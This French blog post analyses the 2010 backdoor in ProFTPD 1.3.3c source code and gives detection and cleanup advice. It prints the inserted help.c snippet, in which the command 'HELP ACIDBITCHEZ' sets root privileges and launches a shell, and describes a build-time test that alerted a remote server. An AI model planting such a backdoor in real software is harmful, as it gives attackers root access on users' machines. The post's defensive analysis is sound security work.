5
Déc
0

HELP ACIDBITCHEZ: un joli fail pour ProfFTPd

Bonjour à tous ! Je suis Snow Miser et je vais aider Heat Miser en écrivant quelques billets sur ce blog!

Pour mon premier billet, je vais vous parler de l’actualité récente et de la compromission du bien nommé : ProFTPD. Pour rappel, il s’agit d’un service FTP.

Les développeurs de ProFTPD se sont rendus compte qu’une backdoor  avaient été ajoutée dans les sources de la version 1.3.3c ! Cette version était disponible du 28 Novembre au 2 Décembre 2010. Mais que s’est’il passé ?

Pour le moment, peu d’infos sont disponibles ! On sait juste que les pirates ont sans doute exploité une faille “zéro day” sur une vieille version de ProFTPD utilisée par les développeurs. Par la suite, après avoir obtenu un accès aux machines des équipes de ProFTPD, ils auraient modifié le code source de la version 1.3.3c afin d’ajouter la backdoor.

Deux modifications ont été apportées :

  • Ajout d’un fichier tests/test.c : lors de la compilation, le test est automatiquement exécuté, ce qui a pour effet d’envoyer une requête HTTP sur un serveur Saoudien (212.26.42.47 qui ne répond plus au moment de l'écriture de ce billet).
  • Modification du fichier src/help.c  : un bout de code est ajouté et permet à une personne malveillante d’obtenir un accès root en tapant la commande HELP ACIDBITCHEZ.
if (strcmp(target, "ACIDBITCHEZ") == 0)
{
    setuid(0);
    setgid(0);
    system("/bin/sh;/sbin/sh");
}

Grosso modo, comment ça fonctionne ?

Quand une victime télécharge et compile la version vulnérable de ProFTPD, une requête est envoyée au serveur Saoudien afin de le prévenir qu’une nouvelle victime a été prise au piège et lui indiquer son adresse IP. Par la suite, l’attaquant est en mesure de venir se connecter au service FTP de la victime. Il lui suffit de taper la commande HELP ACIDBITCHEZ afin d’obtenir un accès root sur la machine !

Le framework Metasploit dispose déjà  de l’exploit ici.

En revanche, ce qui me chagrine dans cette histoire c’est de savoir comment l’équipe a pu se faire “trouer” ! Des rumeurs disent qu’une vulnérabilité dans le module SQL pré-authentification a été utilisée Phrack 67.

Je ne pense pas qu’on sache un jour ce qui s’est passé et je trouve ça dommage quand on voit la transparence de l’équipe d’Apache qui a subi une compromission du même type (avec la backdoor moins).

Moralité de l’histoire pensez à vérifier les hashs MD5 des fichiers que vous téléchargez !

Si vous possédez la version vulnérable (grep ACIDBITCHEZ src/help.c), je vous conseille de couper immédiatement le service et d’installer une version non compromise à la place.

Passez également un peu de temps à analyser vos logs afin de savoir si l’attaquant n’est pas déjà passé là, la probabilité qu’il ait installé une autre backdoor étant tout à fait probable.

Dernière question que je me pose: pourquoi cette backdoor était-elle si visible ?

Ils auraient tout à fait pu insérer du code obfusqué afin que la détection de cette modification soit plus difficile, et donc plus longue.

Au final, l’équipe de ProFTPD aura mis 5 jours pour détecter la porte dérobée: quel était donc le but des pirates ?

Source : http://xorl.wordpress.com/2010/12/02/news-proftpd-owned-and-backdoored/

Hashs MD5 des archives ProFTPD:

Commenter




Celadon theme by the Themes Boutique